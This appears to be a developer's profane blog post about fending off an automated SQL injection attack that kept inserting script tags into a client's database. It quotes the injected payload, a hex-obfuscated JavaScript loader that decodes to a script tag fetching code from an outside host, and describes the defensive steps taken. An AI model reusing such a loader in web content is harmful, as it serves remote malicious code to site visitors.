portal.acras.in - garbage sucking lame ass bitches
Today was...invigorating... to say the least at my day job. We maintain a rather large code base for a client of ours that contained some older code in its deepest darkest nether-regions that allowed for some SQL injection to take place. Although I know I was likely fighting against some junk ass bot, it felt like my opponent was flesh and blood.
Here's how it went down:
BOT: Injects silly script tag
1<script>my lame ass portal full of shit</script>
or...
1<script>
2 var news="b20b3cb73b63b72b69b70b74b20b73b72b63b3db22b68b74b74b70b3ab2fb2fb70b6fb72b74b61b6cb2eb61b63b72b61b73b2eb69b6eb2fb6db6cb2eb70b68b70b22b3eb3cb2fb73b63b72b69b70b74b3e";
3 docs = news.replace(/b/g,'%');
4document.write(that var named docs that I'm not actually going to put in here...);
5 </script>
2 var news="b20b3cb73b63b72b69b70b74b20b73b72b63b3db22b68b74b74b70b3ab2fb2fb70b6fb72b74b61b6cb2eb61b63b72b61b73b2eb69b6eb2fb6db6cb2eb70b68b70b22b3eb3cb2fb73b63b72b69b70b74b3e";
3 docs = news.replace(/b/g,'%');
4document.write(that var named docs that I'm not actually going to put in here...);
5 </script>
ME: finds no trace in CF error logs and sets up a kill script in SQL to remove junk, continues to look for the entry point.
BOT: Injects more crap. This time changing the script's contents.
ME: creates a trigger on the targeted table to remove on update/insert - suck a fat one. continues to look for entry point.
BOT: ...
BOT: ...
BOT: ...
BOT: modifies script tags just enough to bypass trigger checks.
ME: hm, how clever you piece of junk.
ME: locks down the site's datasource to read only and proceeds to setup read and read/write dsns, some regex find and replace goodness and...once again...suck it!
I do enjoy a good duel from time to time, but not when I've got shit to do. So, whoever you are "portal.acras.in" nice try, but not good enough. DIAF KKTHXBYE.
TweetBacks
Well what do ya know? it was a bot QQ :(